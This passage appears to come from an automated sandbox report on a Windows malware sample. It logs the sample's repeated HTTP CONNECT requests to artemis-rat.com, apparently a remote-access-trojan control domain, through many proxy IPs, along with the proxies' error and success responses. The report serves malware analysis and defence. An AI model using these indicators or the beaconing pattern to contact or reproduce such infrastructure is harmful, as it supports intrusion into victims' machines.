65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                              Mar 11, 2024 08:37:24.868498087 CET318INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1596192.168.2.45012441.33.203.23419757284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.538923979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.645268917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.663360119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.663759947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.663122892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:00.663536072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:12.725805044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:36.835104942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:24.837701082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1597192.168.2.450248162.214.121.1189897284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.553004980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.569678068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.663378000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.757318020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.756958961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:00.756867886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:12.772458076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:36.819372892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:24.835015059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1598192.168.2.454685117.160.250.13088997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.651096106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.312817097 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1599192.168.2.450119129.18.164.13080807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.657179117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.033981085 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1600192.168.2.45494379.110.202.13180817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.691406965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1601192.168.2.454961104.17.62.87807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.693000078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.847492933 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1602192.168.2.453129185.49.30.580817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.700099945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1603192.168.2.454993172.67.181.85807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.705411911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.860662937 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1604192.168.2.45310180.84.176.11080807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.714689970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.060879946 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1605192.168.2.45426650.63.12.33254927284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.721307039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.757052898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.762530088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1606192.168.2.45514543.157.49.2044437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.722060919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1607192.168.2.45514643.157.49.2044437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.723434925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1608192.168.2.45514843.157.49.2044437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.724494934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1609192.168.2.45514943.157.49.2044437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.726711988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1610192.168.2.45300951.68.164.77168927284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.731090069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.757170916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.866609097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.866729975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.866209984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:00.866271973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1611192.168.2.453196109.195.23.223340317284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.737858057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.405844927 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1612192.168.2.45497338.54.95.1931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.751668930 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:25.366348028 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:26.069806099 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:27.569726944 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:30.257205009 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:33.069636106 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:35.757134914 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:41.069581985 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:51.553725958 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1613192.168.2.454948185.101.16.52807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.751689911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1614192.168.2.454200162.241.207.217807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.758968115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:50.356154919 CET536INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:50 GMT
                                              Server: Apache
                                              Content-Length: 675
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 72 6f 6f 74 40 73 65 72 76 65 72 2e 61 72 69 61 62 69 72 64 70 6f 64 75 63 74 73 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65
